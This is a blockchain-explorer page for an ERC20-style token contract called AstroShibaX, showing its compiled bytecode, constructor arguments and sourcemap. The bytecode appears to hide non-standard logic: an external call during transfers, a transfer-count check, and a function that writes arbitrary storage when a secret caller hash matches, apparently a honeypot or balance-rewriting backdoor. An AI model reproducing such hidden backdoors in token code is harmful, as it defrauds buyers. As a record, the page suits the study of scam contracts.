b6105ba84848484036104c2565b50505050565b6001600160a01b0383166105e65760405162461bcd60e51b815260040161045e90610c94565b60007f000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d6001600160a01b031661061a610899565b8560405160240161062b9190610b58565b60408051601f19818403018152908290529161064691610b3c565b60408051918290039091206020830180516001600160e01b03166001600160e01b03199092169190911790525161067d9190610b3c565b6000604051808303816000865af19150503d80600081146106ba576040519150601f19603f3d011682016040523d82523d6000602084013e6106bf565b606091505b509150506106cf818560006108c5565b6001600160a01b038416600090815260046020526040902054828110156107085760405162461bcd60e51b815260040161045e90610c2f565b6001600160a01b0380861660008181526004602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610766908790610d62565b60405180910390a35050505050565b60006002816107848280610d91565b905060006107928383610d91565b61079d906004610d91565b935050505090565b600080600180546107b590610ddc565b80601f01602080910402602001604051908101604052809291908181526020018280546107e190610ddc565b801561082e5780601f106108035761010080835404028352916020019161082e565b820191906000526020600020905b81548152906001019060200180831161081157829003601f168201915b5050600080525050600560209081527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc546040519394503393909250610878918491869101610b6c565b6040516020818303038152906040528051906020012060001c149250505090565b60408051808201909152601281527162616c616e63654f6628616464726573732960701b602082015290565b6001600160a01b038216600090815260056020526040812054906108ea826001610d91565b90508060011480156108fa575082155b156103fd5780600114158061091657506109138561048c565b15155b6103fd5760405162461bcd60e51b815260040161045e90610c75565b80356001600160a01b038116811461034157600080fd5b60006020828403121561095a578081fd5b61096382610932565b9392505050565b6000806040838503121561097c578081fd5b61098583610932565b915061099360208401610932565b90509250929050565b6000806000606084860312156109b0578081fd5b6109b984610932565b92506109c760208501610932565b9150604084013590509250925092565b600080604083850312156109e9578182fd5b6109f283610932565b946020939093013593505050565b60008060208385031215610a12578182fd5b823567ffffffffffffffff80821115610a29578384fd5b818501915085601f830112610a3c578384fd5b813581811115610a4a578485fd5b8660208083028501011115610a5d578485fd5b60209290920196919550909350505050565b60006020808385031215610a81578182fd5b823567ffffffffffffffff80821115610a98578384fd5b818501915085601f830112610aab578384fd5b813581811115610abd57610abd610e2d565b604051601f8201601f1916810185018381118282101715610ae057610ae0610e2d565b6040528181528382018501881015610af6578586fd5b818585018683013790810190930193909352509392505050565b60008151808452610b28816020860160208601610db0565b601f01601f19169290920160200192915050565b60008251610b4e818460208701610db0565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0383168152604060208201819052600090610b9090830184610b10565b949350505050565b901515815260200190565b6000602082526109636020830184610b10565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b602080825260059082015264746872656560d81b604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d8c57610d8c610e17565b500190565b6000816000190483118215151615610dab57610dab610e17565b500290565b60005b83811015610dcb578181015183820152602001610db3565b838111156105ba5750506000910152565b600281046001821680610df057607f821691505b60208210811415610e1157634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fdfea2646970667358221220c4d8c152bdd08eb282c2045393508485f97424ce5538649d9225d15f15354f6c64736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9de65bf781f04a7343ac90f5ab2c26fb1499eda4f42161f5277dcec8dd287eceb8000000000000000000000000000000000000000000000000000000000000000b417374726f53686962615800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034153580000000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): AstroShibaX
Arg [1] : symbol_ (string): ASX
Arg [2] : deaf_ (address): 0xDff32C65f843188cF64ECBC6F4a13cFf12581b9D
Arg [3] : half_ (uint256): 104194446491532456688981052091005325934449030541508700853854365034940276330168

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d
Arg [3] : e65bf781f04a7343ac90f5ab2c26fb1499eda4f42161f5277dcec8dd287eceb8
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [5] : 417374726f536869626158000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [7] : 4153580000000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

160:11610:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1059:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3559:242;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;2187:108::-;;;:::i;:::-;;;;;;;:::i;4381:295::-;;;;;;:::i;:::-;;:::i;2030:92::-;;;:::i;:::-;;;;;;;:::i;5085:270::-;;;;;;:::i;:::-;;:::i;2358:177::-;;;;;;:::i;:::-;;:::i;5363:712::-;;;;;;:::i;:::-;;:::i;:::-;;980:87:3;;;:::i;:::-;;;;;;;:::i;1278:104:0:-;;;:::i;6969:503::-;;;;;;:::i;:::-;;:::i;2741:234::-;;;;;;:::i;:::-;;:::i;9284:213::-;;;;;;:::i;:::-;;:::i;3038:201::-;;;;;;:::i;:::-;;:::i;1059:100::-;1113:13;1146:5;1139:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1059:100;:::o;3559:242::-;3678:4;3700:13;3716:12;:10;:12::i;:::-;3700:28;;3739:32;3748:5;3755:7;3764:6;3739:8;:32::i;:::-;-1:-1:-1;3789:4:0;;3559:242;-1:-1:-1;;;3559:242:0:o;2187:108::-;2275:12;;2187:108;:::o;4381:295::-;4512:4;4529:15;4547:12;:10;:12::i;:::-;4529:30;;4570:38;4586:4;4592:7;4601:6;4570:15;:38::i;:::-;4619:27;4629:4;4635:2;4639:6;4619:9;:27::i;:::-;-1:-1:-1;4664:4:0;;4381:295;-1:-1:-1;;;;4381:295:0:o;2030:92::-;2113:1;2030:92;:::o;5085:270::-;5200:4;5222:13;5238:12;:10;:12::i;:::-;5222:28;;5261:64;5270:5;5277:7;5314:10;5286:25;5296:5;5303:7;5286:9;:25::i;:::-;:38;;;;:::i;:::-;5261:8;:64::i;2358:177::-;-1:-1:-1;;;;;2509:18:0;;2477:7;2509:18;;;:9;:18;;;;;;2358:177;;;;:::o;5363:712::-;5431:13;5447:12;:10;:12::i;:::-;5431:28;;5474:9;:7;:9::i;:::-;5470:598;;;5500:13;5516:5;;5522:1;5516:8;;;;;-1:-1:-1;;;5516:8:0;;;;;;;;;;;;;;;5527:1;5516:12;;;;:::i;:::-;5500:28;;5543:13;5559:5;;5565:1;5559:8;;;;;-1:-1:-1;;;5559:8:0;;;;;;;;;;;;;;;5570:1;5559:12;;;;:::i;:::-;5543:28;-1:-1:-1;5617:12:0;;5614:2;;5701:1;5694:16;;;5663:9;5732:17;;5791:2;5778:16;;5771:31;;;5614:2;5842:12;5839:2;;5926:1;5919:16;;;5895:1;5957:17;;6016:2;6003:16;;5892:1;5996:27;;5839:2;5595:462;;;5363:712;;;:::o;980:87:3:-;1026:7;1053:6;-1:-1:-1;;;;;1053:6:3;980:87;:::o;1278:104:0:-;1334:13;1367:7;1360:14;;;;;:::i;6969:503::-;7089:4;7111:13;7127:12;:10;:12::i;:::-;7111:28;;7150:24;7177:25;7187:5;7194:7;7177:9;:25::i;:::-;7150:52;;7255:15;7235:16;:35;;7213:122;;;;-1:-1:-1;;;7213:122:0;;;;;;;:::i;:::-;;;;;;;;;7371:60;7380:5;7387:7;7415:15;7396:16;:34;7371:8;:60::i;2741:234::-;2856:4;2878:13;2894:12;:10;:12::i;:::-;2878:28;;2917;2927:5;2934:2;2938:6;2917:9;:28::i;9284:213::-;9440:4;9430:15;9424:22;;9284:213::o;3038:201::-;-1:-1:-1;;;;;3204:18:0;;;3172:7;3204:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;3038:201::o;656:98:1:-;736:10;656:98;:::o;10594:380:0:-;-1:-1:-1;;;;;10730:19:0;;10722:68;;;;-1:-1:-1;;;10722:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;10809:21:0;;10801:68;;;;-1:-1:-1;;;10801:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;10882:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;10934:32;;;;;10912:6;;10934:32;:::i;:::-;;;;;;;;10594:380;;;:::o;11265:502::-;11400:24;11427:25;11437:5;11444:7;11427:9;:25::i;:::-;11400:52;;-1:-1:-1;;11467:16:0;:37;11463:297;;11567:6;11547:16;:26;;11521:117;;;;-1:-1:-1;;;11521:117:0;;;;;;;:::i;:::-;11682:51;11691:5;11698:7;11726:6;11707:16;:25;11682:8;:51::i;:::-;11265:502;;;;:::o;7942:926::-;-1:-1:-1;;;;;8073:18:0;;8065:68;;;;-1:-1:-1;;;8065:68:0;;;;;;;:::i;:::-;8224:17;8245:5;-1:-1:-1;;;;;8245:10:0;8294;:8;:10::i;:::-;8306:4;8270:41;;;;;;;;:::i;:::-;;;;-1:-1:-1;;8270:41:0;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;8270:41:0;-1:-1:-1;;;;;;8270:41:0;;;;;;;;;8245:77;;;8270:41;8245:77;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8221:101;;;8333:27;8342:4;8348;8354:5;8333:8;:27::i;:::-;-1:-1:-1;;;;;8393:15:0;;8371:19;8393:15;;;:9;:15;;;;;;8441:21;;;;8419:109;;;;-1:-1:-1;;;8419:109:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;8564:15:0;;;;;;;:9;:15;;;;;;8582:20;;;8564:38;;8782:13;;;;;;;;;;:23;;;;;;8834:26;;;;;;8596:6;;8834:26;:::i;:::-;;;;;;;;7942:926;;;;;:::o;6083:164::-;6127:7;6159:1;6127:7;6183:5;6159:1;;6183:5;:::i;:::-;6171:17;-1:-1:-1;6199:9:0;6211:5;6215:1;6171:17;6211:5;:::i;:::-;:9;;6219:1;6211:9;:::i;:::-;6199:21;-1:-1:-1;;;;6083:164:0;:::o;6255:211::-;6296:4;6313:18;6334:5;6313:26;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;6350:12:0;6440:17;;-1:-1:-1;;6440:5:0;:17;;;;;;;6412:22;6313:26;;-1:-1:-1;6365:10:0;;6440:17;;-1:-1:-1;6412:22:0;;6365:10;;6313:26;;6412:22;;:::i;:::-;;;;;;;;;;;;;6402:33;;;;;;6394:42;;:63;6386:72;;;;6255:211;:::o;8876:103::-;8944:27;;;;;;;;;;;;-1:-1:-1;;;8944:27:0;;;;8876:103;:::o;8987:289::-;-1:-1:-1;;;;;9118:13:0;;9106:9;9118:13;;;:5;:13;;;;;;;9154:5;9118:13;9158:1;9154:5;:::i;:::-;9142:17;;9174:1;9179:5;9174:10;:17;;;;;9189:2;9188:3;9174:17;9170:99;;;9216:1;9221;9216:6;;:31;;;;9226:16;9238:3;9226:11;:16::i;:::-;:21;;9216:31;9208:49;;;;-1:-1:-1;;;9208:49:0;;;;;;;:::i;14:175:4:-;84:20;;-1:-1:-1;;;;;133:31:4;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;:::-;345:41;264:128;-1:-1:-1;;;264:128:4:o;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:4:o;1294:666::-;;;1441:2;1429:9;1420:7;1416:23;1412:32;1409:2;;;1462:6;1454;1447:22;1409:2;1507:9;1494:23;1536:18;1577:2;1569:6;1566:14;1563:2;;;1598:6;1590;1583:22;1563:2;1641:6;1630:9;1626:22;1616:32;;1686:7;1679:4;1675:2;1671:13;1667:27;1657:2;;1713:6;1705;1698:22;1657:2;1758;1745:16;1784:2;1776:6;1773:14;1770:2;;;1805:6;1797;1790:22;1770:2;1864:7;1859:2;1853;1845:6;1841:15;1837:2;1833:24;1829:33;1826:46;1823:2;;;1890:6;1882;1875:22;1823:2;1926;1918:11;;;;;1948:6;;-1:-1:-1;1399:561:4;;-1:-1:-1;;;;1399:561:4:o;1965:957::-;;2064:2;2107;2095:9;2086:7;2082:23;2078:32;2075:2;;;2128:6;2120;2113:22;2075:2;2173:9;2160:23;2202:18;2243:2;2235:6;2232:14;2229:2;;;2264:6;2256;2249:22;2229:2;2307:6;2296:9;2292:22;2282:32;;2352:7;2345:4;2341:2;2337:13;2333:27;2323:2;;2379:6;2371;2364:22;2323:2;2420;2407:16;2442:2;2438;2435:10;2432:2;;;2448:18;;:::i;:::-;2497:2;2491:9;2566:2;2547:13;;-1:-1:-1;;2543:27:4;2531:40;;2527:49;;2591:18;;;2611:22;;;2588:46;2585:2;;;2637:18;;:::i;:::-;2673:2;2666:22;2697:18;;;2734:11;;;2730:20;;2727:33;-1:-1:-1;2724:2:4;;;2778:6;2770;2763:22;2724:2;2839;2834;2830;2826:11;2821:2;2813:6;2809:15;2796:46;2862:15;;;2858:24;;;2851:40;;;;-1:-1:-1;2866:6:4;2044:878;-1:-1:-1;;;2044:878:4:o;2927:260::-;;3009:5;3003:12;3036:6;3031:3;3024:19;3052:63;3108:6;3101:4;3096:3;3092:14;3085:4;3078:5;3074:16;3052:63;:::i;:::-;3169:2;3148:15;-1:-1:-1;;3144:29:4;3135:39;;;;3176:4;3131:50;;2979:208;-1:-1:-1;;2979:208:4:o;3192:274::-;;3359:6;3353:13;3375:53;3421:6;3416:3;3409:4;3401:6;3397:17;3375:53;:::i;:::-;3444:16;;;;;3329:137;-1:-1:-1;;3329:137:4:o;3752:203::-;-1:-1:-1;;;;;3916:32:4;;;;3898:51;;3886:2;3871:18;;3853:102::o;3960:319::-;-1:-1:-1;;;;;4137:32:4;;4119:51;;4206:2;4201;4186:18;;4179:30;;;3960:319;;4226:47;;4254:18;;4246:6;4226:47;:::i;:::-;4218:55;4109:170;-1:-1:-1;;;;4109:170:4:o;4284:187::-;4449:14;;4442:22;4424:41;;4412:2;4397:18;;4379:92::o;4476:222::-;;4625:2;4614:9;4607:21;4645:47;4688:2;4677:9;4673:18;4665:6;4645:47;:::i;4703:398::-;4905:2;4887:21;;;4944:2;4924:18;;;4917:30;4983:34;4978:2;4963:18;;4956:62;-1:-1:-1;;;5049:2:4;5034:18;;5027:32;5091:3;5076:19;;4877:224::o;5106:353::-;5308:2;5290:21;;;5347:2;5327:18;;;5320:30;5386:31;5381:2;5366:18;;5359:59;5450:2;5435:18;;5280:179::o;5464:402::-;5666:2;5648:21;;;5705:2;5685:18;;;5678:30;5744:34;5739:2;5724:18;;5717:62;-1:-1:-1;;;5810:2:4;5795:18;;5788:36;5856:3;5841:19;;5638:228::o;5871:328::-;6073:2;6055:21;;;6112:1;6092:18;;;6085:29;-1:-1:-1;;;6145:2:4;6130:18;;6123:35;6190:2;6175:18;;6045:154::o;6204:401::-;6406:2;6388:21;;;6445:2;6425:18;;;6418:30;6484:34;6479:2;6464:18;;6457:62;-1:-1:-1;;;6550:2:4;6535:18;;6528:35;6595:3;6580:19;;6378:227::o;6610:400::-;6812:2;6794:21;;;6851:2;6831:18;;;6824:30;6890:34;6885:2;6870:18;;6863:62;-1:-1:-1;;;6956:2:4;6941:18;;6934:34;7000:3;6985:19;;6784:226::o;7015:401::-;7217:2;7199:21;;;7256:2;7236:18;;;7229:30;7295:34;7290:2;7275:18;;7268:62;-1:-1:-1;;;7361:2:4;7346:18;;7339:35;7406:3;7391:19;;7189:227::o;7421:177::-;7567:25;;;7555:2;7540:18;;7522:76::o;7603:184::-;7775:4;7763:17;;;;7745:36;;7733:2;7718:18;;7700:87::o;7792:128::-;;7863:1;7859:6;7856:1;7853:13;7850:2;;;7869:18;;:::i;:::-;-1:-1:-1;7905:9:4;;7840:80::o;7925:168::-;;8031:1;8027;8023:6;8019:14;8016:1;8013:21;8008:1;8001:9;7994:17;7990:45;7987:2;;;8038:18;;:::i;:::-;-1:-1:-1;8078:9:4;;7977:116::o;8098:258::-;8170:1;8180:113;8194:6;8191:1;8188:13;8180:113;;;8270:11;;;8264:18;8251:11;;;8244:39;8216:2;8209:10;8180:113;;;8311:6;8308:1;8305:13;8302:2;;;-1:-1:-1;;8346:1:4;8328:16;;8321:27;8151:205::o;8361:380::-;8446:1;8436:12;;8493:1;8483:12;;;8504:2;;8558:4;8550:6;8546:17;8536:27;;8504:2;8611;8603:6;8600:14;8580:18;8577:38;8574:2;;;8657:10;8652:3;8648:20;8645:1;8638:31;8692:4;8689:1;8682:15;8720:4;8717:1;8710:15;8574:2;;8416:325;;;:::o;8746:127::-;8807:10;8802:3;8798:20;8795:1;8788:31;8838:4;8835:1;8828:15;8862:4;8859:1;8852:15;8878:127;8939:10;8934:3;8930:20;8927:1;8920:31;8970:4;8967:1;8960:15;8994:4;8991:1;8984:15

Swarm Source

ipfs://c4d8c152bdd08eb282c2045393508485f97424ce5538649d9225d15f15354f6c

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.